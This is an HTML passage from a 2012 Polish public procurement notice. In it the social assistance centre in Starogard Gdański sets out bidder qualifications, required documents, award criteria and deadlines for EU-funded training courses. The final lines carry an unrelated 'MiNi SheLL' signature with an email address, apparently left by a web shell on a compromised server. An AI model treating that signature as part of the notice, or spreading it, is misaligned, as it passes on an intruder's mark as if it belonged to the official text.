<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedstawi oświadczenie, że dysponuje potencjałem technicznym potrzebnym do wykonania zamówienia (zał. Nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że będzie dysponował osobami o wykształceniu, kwalifikacjach i doświadczeniu niezbędnymi do realizacji poszczególnych kursów, wykładowcy/instruktorzy posiadać będą doświadczenie zawodowe w postaci przeprowadzonych w okresie ostatnich trzech lat minimum trzech kursów z zakresu tematyki, jaką będą wykładać na kursie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedstawi oświadczenie, że się znajduje w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
(zał. Nr 6 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">program szkolenia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy, że figuruje w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.inwestycjawkadry.pl i aktualizował w tej bazie informację o każdym szkoleniu otwartym organizowanym w ramach Projektu nie rzadziej niż raz w miesiącu.
2. Wzory zaświadczeń/certyfikatów, świadectw kwalifikacyjnych potwierdzających ukończenie szkolenia i nabycie kwalifikacji,
3. Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik,
4. Pełnomocnictwo, w przypadku podmiotów występujących wspólnie, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (jeśli dotyczy),
5 Pisemne zobowiązanie podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków,
6 Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w pkt VI SIWZ polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt.VII.2,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy (np. choroba, śmierć itp.). W przypadku zmiany wykładowcy wykonawca zobowiązany jest zapewnić, aby nowy wykładowca spełniał warunki określone w pkt. VI.4.1.
2. Zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
3. Zmiany harmonogramu zajęć i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.starogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
al. Jana Pawła II 6
83-200 Starogard Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
al. Jana Pawła II 6
83-200 Starogard Gdański.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn. Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański - edycja 2012-2013, współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com